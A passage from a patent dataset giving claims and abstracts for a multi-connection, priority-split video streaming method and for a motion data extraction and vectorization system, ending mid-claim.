reading encoded video content from one or more storage devices, the encoded video content including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order; separating out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; streaming the high priority bitstream and low-priority bitstreams in parallel over the first and second streaming connections; and reassembling the I-frame, P-frame, and B-frame content in the high-priority and low-priority bitstreams such that the original encoded order of the I-frame, P-frame and B-frame content is restored. 6. The method of claim 5, wherein the encoded video content that is read from storage includes audio content, and the method further comprises:
extracting the audio content as an audio bitstream; streaming the audio bitstream over the first streaming connection; and adding the audio content to the reassembled video content. 7. The method of claim 1, further comprising:
splitting video content encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams; streaming the base layer bitstream over the first streaming connection; streaming the one or more enhancement layer bitstreams over the second streaming connection; and decoding the base layer bitstream and the one or more enhancement layer bitstreams at the video streaming client to playback the video content. 8. The method of claim 1, further comprising:
employing context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over that streaming connection. 9. The method of claim 8, wherein the context information includes network layer context information and application layer context information. 10. A video streaming server, comprising:
a processor; memory; operatively coupled to the processor; a network interface, operatively coupled to the processor; a storage device, having instructions stored therein that are configured to be executed on the processor to cause the video streaming server to,
split video content into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream;
transmit the high priority bitstream from the network interface to a video streaming client over a first streaming connection between the video streaming server and the video streaming client employing a reliable transport mechanism; and
transmit the low priority bitstream from the network interface to the video streaming client over a second streaming connection between the video streaming server and the video streaming client. 11. The video streaming server of claim 10, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection. 12. The video streaming server of claim 10, wherein the second streaming connection employs an HTTP (Hypertext Transport Protocol) over UDP (user datagram protocol) streaming connection. 13. The video streaming server of claim 10, wherein the second streaming connection comprises an HTTP (Hypertext Transport Protocol) over a modified TCP (transmission control protocol) streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 14. The video streaming server of claim 10, wherein the video streaming server further comprises an interface to access one or more storage devices, and wherein execution of the instructions further causes the video streaming server to:
read encoded video content from one or more storage devices, the encoded video content including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order; separate out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; and stream the high priority bitstream and low-priority bitstreams in parallel over the first and second streaming connections. 15. The video streaming server of claim 14, wherein the encoded video content that is read from the one or more storage devices includes audio content, and wherein execution of the instructions further causes the video streaming server to:
extract the audio content as an audio bitstream; and stream the audio bitstream over the first streaming connection. 16. The video streaming server of claim 10, wherein execution of the instructions further causes the video streaming server to:
split video content encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams; stream the base layer bitstream over the first streaming connection; and stream the one or more enhancement layer bitstreams over the second streaming connection. 17. The video streaming server of claim 10, wherein execution of the instructions further causes the video streaming server to employ at least one of network layer context information and application layer context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over the that streaming connection. 18. A video streaming client, comprising:
a processor; memory, operatively coupled to the processor; a display driver, operatively coupled to at least one of the processor and the memory; a network interface, operatively coupled to the processor; and a storage device, having instructions stored therein that are configured to be executed on the processor to cause the video streaming client to,
receive, at the network interface, a plurality of encoded video bitstreams streams from a video streaming server using a plurality of streaming connections, wherein the plurality of encoded video bitstreams are derived from original video content that has been split by the video streaming server into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream, and wherein the high priority bitstream is received over a first streaming connection and a low priority bitstream is received over a second streaming connection;
reassemble the plurality of encoded video bitstreams that are received at the network interface into a reassembled encoded video bitstream; and
decode the reassembled encoded video bitstream to playback the original video content via the display driver as signals representative of a plurality of video frames. 19. The video streaming client of claim 18, wherein the video streaming client comprises a wireless device having a wireless network interface and a display coupled to the display driver, wherein the plurality of encoded video bitstreams are received via the wireless network interface, and when the signals representative of the plurality of video frames are processed by the video streaming client to generate a sequence of video frames on the display. 20. The video streaming client of claim 18, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection, and the second streaming connection employs one of:
an HTTP over UDP (user datagram protocol) streaming connection; or an HTTP over a modified TCP streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 21. The video streaming client of claim 18, wherein the origin video content comprises a plurality of frames including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order, and wherein execution of the instructions further causes the video streaming client to:
separate out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; receive I-frame content via the first streaming connection; receive P-frame and B-frame content via the second streaming connections; and reassemble the I-frame, P-frame, and B-frame content into a recombined bitstream such that the original encoded order of the I-frame, P-frame and B-frame content is restored. 22. The video streaming client of claim 21, wherein the video streaming server further comprises an audio interface, wherein the encoded video content that is read from the one or more storage devices includes audio content, and wherein execution of the instructions further causes the video streaming client to:
receive the audio content via the first streaming connection; extract the audio content as an audio bitstream; and playback the audio content over the audio interface. 23. The video streaming client of claim 18, wherein the original video content is encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams, and wherein execution of the instructions further causes the video streaming client to:
receive the base layer bitstream over the first streaming connection; split video content encoded using the SVC coder into a base layer bitstream and one or more enhancement layer bitstreams; stream the base layer bitstream over the first streaming connection; receive the one or more enhancement layer bitstreams over the second streaming connection; and decode the base layer bitstream and the one or more enhancement layer bitstreams to playback the original video content via the display driver as signals representative of a plurality of video frames. 24. The video streaming client of claim 18, wherein execution of the instructions further causes the video streaming client to employ at least one of network layer context information and application layer context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over the that streaming connection. 25. The video streaming client of claim 18, wherein one of the streaming connections employs TCP (transmission control protocol), and wherein execution of the instructions further causes the video streaming client to:
receive a plurality of TCP segments; detect the plurality the TCP segments includes a missing TCP segment resulting in gap followed by an out-of-order TCP segment; and determine the out-of-order TCP segment may be forwarded for further processing without the missing TCP segment. | Methods, apparatus, systems, and software for implementing context adaptive video streaming using multiple streaming connections. Original video content is split into multiple bitstreams at a video streaming server and streamed to a video streaming client. Higher-importance video content, such as I-frames and the base layer for scalable video coder (SVC) content are streamed over a high-priority streaming connection, while lower-importance video content is streamed over a low-priority streaming connection. The high-priority streaming connection may employ a reliable connection protocol such as TCP protocol, while the lower-priority connection may employ UDP or a modified TCP protocol under which some portions of the bitstream may be dropped. Cross-layer context adaptive streaming may be implemented under which context data such as network context and video application context information may be considered to adjust parameters associated with implement one or more streaming connections.1. A method for streaming video content from a video streaming server to a video streaming client, comprising;
splitting video content into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream; transmitting the plurality of encoded video bitstreams using a plurality of streaming connections, wherein the high priority bitstream is transmitted over a first streaming connection using a reliable transport mechanism, and wherein the low priority bitstream is transmitted using a second streaming connection under which content that is not successfully received may or may not be retransmitted; reassembling the plurality of encoded video bitstreams that are received at the video streaming client into a reassembled encoded video bitstream; and decoding the reassembled encoded video bitstream to playback the video content as a plurality of video frames. 2. The method of claim 1, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection. 3. The method of claim 1, wherein the second streaming connection employs an HTTP (Hypertext Transport Protocol) over UDP (user datagram protocol) over streaming connection. 4. The method of claim 1, wherein the second streaming connection comprises an HTTP (Hypertext Transport Protocol) over a modified TCP (transmission control protocol) streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 5. The method of claim 1, further comprising:
reading encoded video content from one or more storage devices, the encoded video content including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order; separating out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; streaming the high priority bitstream and low-priority bitstreams in parallel over the first and second streaming connections; and reassembling the I-frame, P-frame, and B-frame content in the high-priority and low-priority bitstreams such that the original encoded order of the I-frame, P-frame and B-frame content is restored. 6. The method of claim 5, wherein the encoded video content that is read from storage includes audio content, and the method further comprises:
extracting the audio content as an audio bitstream; streaming the audio bitstream over the first streaming connection; and adding the audio content to the reassembled video content. 7. The method of claim 1, further comprising:
splitting video content encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams; streaming the base layer bitstream over the first streaming connection; streaming the one or more enhancement layer bitstreams over the second streaming connection; and decoding the base layer bitstream and the one or more enhancement layer bitstreams at the video streaming client to playback the video content. 8. The method of claim 1, further comprising:
employing context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over that streaming connection. 9. The method of claim 8, wherein the context information includes network layer context information and application layer context information. 10. A video streaming server, comprising:
a processor; memory; operatively coupled to the processor; a network interface, operatively coupled to the processor; a storage device, having instructions stored therein that are configured to be executed on the processor to cause the video streaming server to,
split video content into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream;
transmit the high priority bitstream from the network interface to a video streaming client over a first streaming connection between the video streaming server and the video streaming client employing a reliable transport mechanism; and
transmit the low priority bitstream from the network interface to the video streaming client over a second streaming connection between the video streaming server and the video streaming client. 11. The video streaming server of claim 10, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection. 12. The video streaming server of claim 10, wherein the second streaming connection employs an HTTP (Hypertext Transport Protocol) over UDP (user datagram protocol) streaming connection. 13. The video streaming server of claim 10, wherein the second streaming connection comprises an HTTP (Hypertext Transport Protocol) over a modified TCP (transmission control protocol) streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 14. The video streaming server of claim 10, wherein the video streaming server further comprises an interface to access one or more storage devices, and wherein execution of the instructions further causes the video streaming server to:
read encoded video content from one or more storage devices, the encoded video content including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order; separate out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; and stream the high priority bitstream and low-priority bitstreams in parallel over the first and second streaming connections. 15. The video streaming server of claim 14, wherein the encoded video content that is read from the one or more storage devices includes audio content, and wherein execution of the instructions further causes the video streaming server to:
extract the audio content as an audio bitstream; and stream the audio bitstream over the first streaming connection. 16. The video streaming server of claim 10, wherein execution of the instructions further causes the video streaming server to:
split video content encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams; stream the base layer bitstream over the first streaming connection; and stream the one or more enhancement layer bitstreams over the second streaming connection. 17. The video streaming server of claim 10, wherein execution of the instructions further causes the video streaming server to employ at least one of network layer context information and application layer context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over the that streaming connection. 18. A video streaming client, comprising:
a processor; memory, operatively coupled to the processor; a display driver, operatively coupled to at least one of the processor and the memory; a network interface, operatively coupled to the processor; and a storage device, having instructions stored therein that are configured to be executed on the processor to cause the video streaming client to,
receive, at the network interface, a plurality of encoded video bitstreams streams from a video streaming server using a plurality of streaming connections, wherein the plurality of encoded video bitstreams are derived from original video content that has been split by the video streaming server into a plurality of encoded video bitstreams having at least two priority levels including a high priority bitstream and a low priority bitstream, and wherein the high priority bitstream is received over a first streaming connection and a low priority bitstream is received over a second streaming connection;
reassemble the plurality of encoded video bitstreams that are received at the network interface into a reassembled encoded video bitstream; and
decode the reassembled encoded video bitstream to playback the original video content via the display driver as signals representative of a plurality of video frames. 19. The video streaming client of claim 18, wherein the video streaming client comprises a wireless device having a wireless network interface and a display coupled to the display driver, wherein the plurality of encoded video bitstreams are received via the wireless network interface, and when the signals representative of the plurality of video frames are processed by the video streaming client to generate a sequence of video frames on the display. 20. The video streaming client of claim 18, wherein the first streaming connection employs an HTTP (Hypertext Transport Protocol) over TCP (transmission control protocol) streaming connection, and the second streaming connection employs one of:
an HTTP over UDP (user datagram protocol) streaming connection; or an HTTP over a modified TCP streaming connection under which an ACKnowledgement indicating each TCP segment is returned to the video streaming server whether or not the TCP segment is successfully received at the video streaming client. 21. The video streaming client of claim 18, wherein the origin video content comprises a plurality of frames including intra-frames (I-frames), predictive-frames (P-frames), and bi-directional frames (B-frames) encoded in an original order, and wherein execution of the instructions further causes the video streaming client to:
separate out the I-frame content to generate a high priority bitstream comprising the I-frame content and a low priority bitstream comprising the P-frame and B-frame content; receive I-frame content via the first streaming connection; receive P-frame and B-frame content via the second streaming connections; and reassemble the I-frame, P-frame, and B-frame content into a recombined bitstream such that the original encoded order of the I-frame, P-frame and B-frame content is restored. 22. The video streaming client of claim 21, wherein the video streaming server further comprises an audio interface, wherein the encoded video content that is read from the one or more storage devices includes audio content, and wherein execution of the instructions further causes the video streaming client to:
receive the audio content via the first streaming connection; extract the audio content as an audio bitstream; and playback the audio content over the audio interface. 23. The video streaming client of claim 18, wherein the original video content is encoded using a scalable video coding (SVC) coder into a base layer bitstream and one or more enhancement layer bitstreams, and wherein execution of the instructions further causes the video streaming client to:
receive the base layer bitstream over the first streaming connection; split video content encoded using the SVC coder into a base layer bitstream and one or more enhancement layer bitstreams; stream the base layer bitstream over the first streaming connection; receive the one or more enhancement layer bitstreams over the second streaming connection; and decode the base layer bitstream and the one or more enhancement layer bitstreams to playback the original video content via the display driver as signals representative of a plurality of video frames. 24. The video streaming client of claim 18, wherein execution of the instructions further causes the video streaming client to employ at least one of network layer context information and application layer context information associated with at least one of the first and second streaming connections to manage transfer of video bitstream content over the that streaming connection. 25. The video streaming client of claim 18, wherein one of the streaming connections employs TCP (transmission control protocol), and wherein execution of the instructions further causes the video streaming client to:
receive a plurality of TCP segments; detect the plurality the TCP segments includes a missing TCP segment resulting in gap followed by an out-of-order TCP segment; and determine the out-of-order TCP segment may be forwarded for further processing without the missing TCP segment. | 2,400 |
9,166 | 9,166 | 14,665,810 | 2,482 | A method and a motion data extraction and vectorization system (MDEVS) extract and vectorize motion data of an object in motion with optimized data storage and data transmission bandwidth. The MDEVS includes an image sensor, a motion data processor, and a storage unit. The image sensor captures video data including a series of image frames of the object in motion. The motion data processor detects an object in motion from consecutive image frames, extracts motion data of the detected object in motion from each image frame, and generates a matrix of vectors defining the object in motion for each image frame using the extracted motion data. The motion data includes, for example, image data of the object, trajectory data, relative physical dimensions, a type of the object, time stamp of each image frame, etc. The storage unit maintains the generated matrix of vectors for local storage, transmission, and analysis. | 1. A method for extracting and vectorizing motion data of an object in motion with optimized data storage and data transmission bandwidth, said method employing an image sensor in operable communication with a motion data processor configured to execute computer program instructions for performing one or more steps of said method, said method comprising:
receiving video data comprising a series of image frames of said object in motion from said image sensor by said motion data processor; detecting said object in motion from consecutive said image frames of said received video data by said motion data processor; extracting motion data of said detected object in motion from each of said image frames of said received video data by said motion data processor; generating a matrix of vectors configured to define said object in motion for said each of said image frames by said motion data processor using said extracted motion data; and maintaining said generated matrix of vectors in a storage unit for one or more of local storage, transmission, and analysis. 2. The method of claim 1, further comprising transmitting said generated matrix of vectors from said storage unit to an analytics system by an operations unit in operable communication with said storage unit for said analysis, wherein said analysis comprises one or more of estimating prospective trajectory data of motion of said detected object in motion, determining a period of presence of said object, determining a velocity of traversal of said detected object in motion, and determining gestures of said object. 3. The method of claim 1, wherein said detection of said object in motion from said consecutive said image frames by said motion data processor comprises:
comparing said consecutive said image frames with each other by said motion data processor for detecting said object in motion, while excluding a background of said object in motion; and comparing said detected object in motion with one or more object libraries by said motion data processor for confirming said detection of said object in motion. 4. The method of claim 1, further comprising:
dynamically selecting one or more of a plurality of predefined data extraction algorithms and an object library by said motion data processor based on matching of said extracted motion data with selection criteria; and extracting said motion data of subsequent said image frames by said motion data processor using said dynamically selected one or more of said predefined data extraction algorithms and said object library. 5. The method of claim 1, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames. 6. The method of claim 1, wherein each of said vectors of said generated matrix is defined by two or more spatial coordinates. 7. The method of claim 1, wherein said generated matrix of vectors is represented by a representation box, wherein said representation box is configured to define prospective trajectory data of motion of said detected object in motion. 8. The method of claim 1, further comprising compressing said video data by a data compression processor in operable communication with an image signal processor. 9. The method of claim 1, further comprising compressing said extracted motion data and said generated matrix of vectors by a data compression processor in operable communication with said motion data processor. 10. The method of claim 1, further comprising dynamically enhancing image granularity of said video data by an image signal processor in operable communication with said image sensor, for facilitating said extraction of said motion data from said each of said image frames by said motion data processor. 11. The method of claim 1, further comprising capturing one or more snapshots of said detected object in motion by said image sensor on receiving an indication from said motion data processor, for facilitating identification and said analysis of said detected object in motion from said each of said image frames of said video data. 12. A motion data extraction and vectorization system for extracting and vectorizing motion data of an object in motion with optimized data storage and data transmission bandwidth, said motion data extraction and vectorization system comprising:
an image sensor configured to capture video data comprising a series of image frames of said object in motion; a motion data processor in operable communication with said image sensor, said motion data processor configured to receive said video data from said image sensor; said motion data processor further configured to detect said object in motion from consecutive said image frames of said received video data; said motion data processor further configured to extract motion data of said detected object in motion from each of said image frames of said received video data; said motion data processor further configured to generate a matrix of vectors configured to define said object in motion for said each of said image frames using said extracted motion data; and a storage unit in operable communication with said motion data processor, said storage unit configured to maintain said generated matrix of vectors for one or more of local storage, transmission, and analysis. 13. The motion data extraction and vectorization system of claim 12, further comprising an operations unit in operable communication with said storage unit, wherein said operations unit is configured to transmit said generated matrix of vectors from said storage unit to an analytics system for said analysis, wherein said analytics system is configured to perform said analysis comprising one or more of estimating prospective trajectory data of motion of said detected object in motion, determining a period of presence of said object, determining a velocity of traversal of said object in motion, and determining gestures of said object. 14. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is configured to perform said detection of said object in motion from said consecutive said image frames by:
comparing said consecutive said image frames with each other for detecting said object in motion, while excluding a background of said object in motion; and comparing said detected object in motion with one or more object libraries for confirming said detection of said object in motion. 15. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is further configured to dynamically select one or more of a plurality of predefined data extraction algorithms and an object library based on matching of said extracted motion data with selection criteria, and wherein said motion data processor is further configured to extract said motion data of subsequent said image frames using said dynamically selected one or more of said predefined data extraction algorithms and said object library. 16. The motion data extraction and vectorization system of claim 12, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames. 17. The motion data extraction and vectorization system of claim 12, wherein each of said vectors of said generated matrix is defined by two or more spatial coordinates. 18. The motion data extraction and vectorization system of claim 12, wherein said generated matrix of vectors is represented by a representation box, wherein said representation box is configured to define prospective trajectory data of motion of said detected object in motion. 19. The motion data extraction and vectorization system of claim 12, wherein said image sensor is further configured to capture one or more snapshots of said detected object in motion on receiving an indication from said motion data processor, for facilitating identification and said analysis of said detected object in motion from said each of said image frames of said video data. 20. The motion data extraction and vectorization system of claim 12, further comprising a data compression processor in operable communication with an image signal processor, wherein said data compression processor is configured to compress said video data enhanced by said image signal processor. 21. The motion data extraction and vectorization system of claim 12, further comprising a data compression processor in operable communication with said motion data processor, wherein said data compression processor is configured to compress said extracted motion data and said generated matrix of vectors received from said motion data processor. 22. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor in operable communication with said image sensor, wherein said image signal processor is configured to dynamically enhance image granularity of said video data received from said image sensor for facilitating said extraction of said motion data from said each of said image frames by said motion data processor. 23. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, wherein said image signal processor is in operable communication with said motion data processor and a data compression processor positioned in parallel to each other, wherein said motion data processor is configured to extract and vectorize said motion data of said detected object in motion from said video data enhanced by said image signal processor, and wherein said data compression processor is configured to compress said video data enhanced by said image signal processor. 24. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, wherein said image signal processor is in operable communication with said motion data processor, wherein said motion data processor is configured to extract and vectorize said motion data of said detected object in motion from said video data enhanced by said image signal processor. 25. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is operably connected in series between an image signal processor and a data compression processor for said extraction and said vectorization of said motion data of said detected object in motion from said video data enhanced by said image signal processor, wherein said image signal processor is integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, and wherein said data compression processor is configured to compress said motion data that is extracted and vectorized by said motion data processor. 26. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with a data compression processor, and wherein said motion data processor is operably connected between said image sensor and said data compression processor for said extraction and said vectorization of said motion data of said detected object in motion from said video data received from said image sensor, wherein said image signal processor is configured to enhance an image quality of said video data received from said image sensor, and wherein said data compression processor is configured to compress said motion data that is extracted and vectorized by said motion data processor and to compress said video data enhanced by said image signal processor. 27. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor and a data compression processor positioned in parallel communication with said motion data processor and disabled when motion of said object is not detected for optimizing power consumption required for said capture of said video data. 28. The motion data extraction and vectorization system of claim 12, wherein said storage unit is further configured to store enhanced video data, compressed video data, said extracted motion data, compressed motion data, said generated matrix of vectors, and a compressed said matrix of vectors. 29. The motion data extraction and vectorization system of claim 12 configured as one or more of an integrated chip and a computer system comprising at least one processor configured to execute computer program instructions for said extraction and said vectorization of said motion data of said detected object in motion with said optimized data storage and said data transmission bandwidth. 30. A computer program product comprising a non-transitory computer readable storage medium, said non-transitory computer readable storage medium storing computer program codes that comprise instructions executable by a motion data processor, said computer program codes comprising:
a first computer program code for detecting an object in motion from consecutive image frames of video data received from an image sensor; a second computer program code for extracting motion data of said detected object in motion from each of a series of image frames of said received video data, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames; and a third computer program code for generating a matrix of vectors configured to define said object in motion for said each of said image frames using said extracted motion data. 31. The computer program product of claim 30, wherein said first computer program code further comprises:
a fourth computer program code for comparing said consecutive said image frames with each other for detecting said object in motion, while excluding a background of said object in motion; and a fifth computer program code for comparing said detected object in motion with one or more object libraries for confirming said detection of said object in motion. 32. The computer program product of claim 30, wherein said second computer program code further comprises:
a sixth computer program code for dynamically selecting one or more of a plurality of predefined data extraction algorithms and an object library based on matching of said extracted motion data with selection criteria; and a seventh computer program code for extracting said motion data of subsequent said image frames using said dynamically selected one or more of said predefined data extraction algorithms and said object library. | A method and a motion data extraction and vectorization system (MDEVS) extract and vectorize motion data of an object in motion with optimized data storage and data transmission bandwidth. The MDEVS includes an image sensor, a motion data processor, and a storage unit. The image sensor captures video data including a series of image frames of the object in motion. The motion data processor detects an object in motion from consecutive image frames, extracts motion data of the detected object in motion from each image frame, and generates a matrix of vectors defining the object in motion for each image frame using the extracted motion data. The motion data includes, for example, image data of the object, trajectory data, relative physical dimensions, a type of the object, time stamp of each image frame, etc. The storage unit maintains the generated matrix of vectors for local storage, transmission, and analysis.1. A method for extracting and vectorizing motion data of an object in motion with optimized data storage and data transmission bandwidth, said method employing an image sensor in operable communication with a motion data processor configured to execute computer program instructions for performing one or more steps of said method, said method comprising:
receiving video data comprising a series of image frames of said object in motion from said image sensor by said motion data processor; detecting said object in motion from consecutive said image frames of said received video data by said motion data processor; extracting motion data of said detected object in motion from each of said image frames of said received video data by said motion data processor; generating a matrix of vectors configured to define said object in motion for said each of said image frames by said motion data processor using said extracted motion data; and maintaining said generated matrix of vectors in a storage unit for one or more of local storage, transmission, and analysis. 2. The method of claim 1, further comprising transmitting said generated matrix of vectors from said storage unit to an analytics system by an operations unit in operable communication with said storage unit for said analysis, wherein said analysis comprises one or more of estimating prospective trajectory data of motion of said detected object in motion, determining a period of presence of said object, determining a velocity of traversal of said detected object in motion, and determining gestures of said object. 3. The method of claim 1, wherein said detection of said object in motion from said consecutive said image frames by said motion data processor comprises:
comparing said consecutive said image frames with each other by said motion data processor for detecting said object in motion, while excluding a background of said object in motion; and comparing said detected object in motion with one or more object libraries by said motion data processor for confirming said detection of said object in motion. 4. The method of claim 1, further comprising:
dynamically selecting one or more of a plurality of predefined data extraction algorithms and an object library by said motion data processor based on matching of said extracted motion data with selection criteria; and extracting said motion data of subsequent said image frames by said motion data processor using said dynamically selected one or more of said predefined data extraction algorithms and said object library. 5. The method of claim 1, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames. 6. The method of claim 1, wherein each of said vectors of said generated matrix is defined by two or more spatial coordinates. 7. The method of claim 1, wherein said generated matrix of vectors is represented by a representation box, wherein said representation box is configured to define prospective trajectory data of motion of said detected object in motion. 8. The method of claim 1, further comprising compressing said video data by a data compression processor in operable communication with an image signal processor. 9. The method of claim 1, further comprising compressing said extracted motion data and said generated matrix of vectors by a data compression processor in operable communication with said motion data processor. 10. The method of claim 1, further comprising dynamically enhancing image granularity of said video data by an image signal processor in operable communication with said image sensor, for facilitating said extraction of said motion data from said each of said image frames by said motion data processor. 11. The method of claim 1, further comprising capturing one or more snapshots of said detected object in motion by said image sensor on receiving an indication from said motion data processor, for facilitating identification and said analysis of said detected object in motion from said each of said image frames of said video data. 12. A motion data extraction and vectorization system for extracting and vectorizing motion data of an object in motion with optimized data storage and data transmission bandwidth, said motion data extraction and vectorization system comprising:
an image sensor configured to capture video data comprising a series of image frames of said object in motion; a motion data processor in operable communication with said image sensor, said motion data processor configured to receive said video data from said image sensor; said motion data processor further configured to detect said object in motion from consecutive said image frames of said received video data; said motion data processor further configured to extract motion data of said detected object in motion from each of said image frames of said received video data; said motion data processor further configured to generate a matrix of vectors configured to define said object in motion for said each of said image frames using said extracted motion data; and a storage unit in operable communication with said motion data processor, said storage unit configured to maintain said generated matrix of vectors for one or more of local storage, transmission, and analysis. 13. The motion data extraction and vectorization system of claim 12, further comprising an operations unit in operable communication with said storage unit, wherein said operations unit is configured to transmit said generated matrix of vectors from said storage unit to an analytics system for said analysis, wherein said analytics system is configured to perform said analysis comprising one or more of estimating prospective trajectory data of motion of said detected object in motion, determining a period of presence of said object, determining a velocity of traversal of said object in motion, and determining gestures of said object. 14. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is configured to perform said detection of said object in motion from said consecutive said image frames by:
comparing said consecutive said image frames with each other for detecting said object in motion, while excluding a background of said object in motion; and comparing said detected object in motion with one or more object libraries for confirming said detection of said object in motion. 15. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is further configured to dynamically select one or more of a plurality of predefined data extraction algorithms and an object library based on matching of said extracted motion data with selection criteria, and wherein said motion data processor is further configured to extract said motion data of subsequent said image frames using said dynamically selected one or more of said predefined data extraction algorithms and said object library. 16. The motion data extraction and vectorization system of claim 12, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames. 17. The motion data extraction and vectorization system of claim 12, wherein each of said vectors of said generated matrix is defined by two or more spatial coordinates. 18. The motion data extraction and vectorization system of claim 12, wherein said generated matrix of vectors is represented by a representation box, wherein said representation box is configured to define prospective trajectory data of motion of said detected object in motion. 19. The motion data extraction and vectorization system of claim 12, wherein said image sensor is further configured to capture one or more snapshots of said detected object in motion on receiving an indication from said motion data processor, for facilitating identification and said analysis of said detected object in motion from said each of said image frames of said video data. 20. The motion data extraction and vectorization system of claim 12, further comprising a data compression processor in operable communication with an image signal processor, wherein said data compression processor is configured to compress said video data enhanced by said image signal processor. 21. The motion data extraction and vectorization system of claim 12, further comprising a data compression processor in operable communication with said motion data processor, wherein said data compression processor is configured to compress said extracted motion data and said generated matrix of vectors received from said motion data processor. 22. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor in operable communication with said image sensor, wherein said image signal processor is configured to dynamically enhance image granularity of said video data received from said image sensor for facilitating said extraction of said motion data from said each of said image frames by said motion data processor. 23. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, wherein said image signal processor is in operable communication with said motion data processor and a data compression processor positioned in parallel to each other, wherein said motion data processor is configured to extract and vectorize said motion data of said detected object in motion from said video data enhanced by said image signal processor, and wherein said data compression processor is configured to compress said video data enhanced by said image signal processor. 24. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, wherein said image signal processor is in operable communication with said motion data processor, wherein said motion data processor is configured to extract and vectorize said motion data of said detected object in motion from said video data enhanced by said image signal processor. 25. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is operably connected in series between an image signal processor and a data compression processor for said extraction and said vectorization of said motion data of said detected object in motion from said video data enhanced by said image signal processor, wherein said image signal processor is integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, and wherein said data compression processor is configured to compress said motion data that is extracted and vectorized by said motion data processor. 26. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with a data compression processor, and wherein said motion data processor is operably connected between said image sensor and said data compression processor for said extraction and said vectorization of said motion data of said detected object in motion from said video data received from said image sensor, wherein said image signal processor is configured to enhance an image quality of said video data received from said image sensor, and wherein said data compression processor is configured to compress said motion data that is extracted and vectorized by said motion data processor and to compress said video data enhanced by said image signal processor. 27. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor and a data compression processor positioned in parallel communication with said motion data processor and disabled when motion of said object is not detected for optimizing power consumption required for said capture of said video data. 28. The motion data extraction and vectorization system of claim 12, wherein said storage unit is further configured to store enhanced video data, compressed video data, said extracted motion data, compressed motion data, said generated matrix of vectors, and a compressed said matrix of vectors. 29. The motion 